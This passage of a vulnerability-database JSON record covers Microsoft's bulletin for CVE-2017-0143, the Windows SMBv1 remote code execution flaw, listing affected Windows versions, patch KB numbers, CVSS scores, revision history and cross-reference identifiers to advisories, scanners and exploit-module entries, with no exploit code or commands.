"KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": 
"KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", 
"kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}, "_object_type": "robots.models.mscve.MsCveBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.mscve.MsCveBulletin"]}, {"id": "MS:CVE-2017-0143", "hash": "f324e1b1a767a69b593af7c244e24715", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-06T10:49:13", "history": [{"bulletin": {"id": "MS:CVE-2017-0143", "hash": "26eda409007e1a8c7a93c06533ed2a25eb45dea9e75df925363eb278e2efae4d", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft\nServer Message Block 1.0 (SMBv1) 
server handles certain requests. An attacker\nwho successfully exploited the vulnerability could gain the ability to execute\ncode on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker\ncould send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1\nhandles these specially crafted requests.\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2019-08-05T14:04:37", "history": [], "viewCount": 6, "enchantments": {"dependencies": {"modified": "2019-08-05T14:04:37", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": 
["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-08-05T14:04:37", "rev": 2, "value": 7.8, "vector": "NONE"}}, "objectVersion": "1.4", "kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", 
"KB3210720", "KB3205401", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows RT 8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 
2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2019-08-05T14:04:37", "differentElements": ["description"], "edition": 1}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "913c2f0877fdcdf712e8767a5badd996", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2020-08-07T11:48:32", "history": [], "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", 
"1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2020-08-07T11:48:32", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2020-08-07T11:48:32", "rev": 2}}, "objectVersion": "1.4", 
"kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", "KB3210720", "KB3205401", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows RT 
8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2020-08-07T11:48:32", "differentElements": ["href", "kbList", "msAffectedSoftware"], "edition": 2}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "7d880ac23613cccab94717a71e1949e7", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-03-18T19:17:49", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", 
"PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-03-18T19:17:49", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-03-18T19:17:49", "rev": 2}}, "objectVersion": "1.5", "kbList": 
["KB4013198", "KB3205401", "KB3177186", "KB3212646", "KB4012214", "KB4012598", "KB3205409", "KBMS16-110, 3187754", "KB3210720", "KB3213986", "KB3210721", "KB4013429", "KB4012215", "KB4012216", "KB4012606", "KB4012217", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", 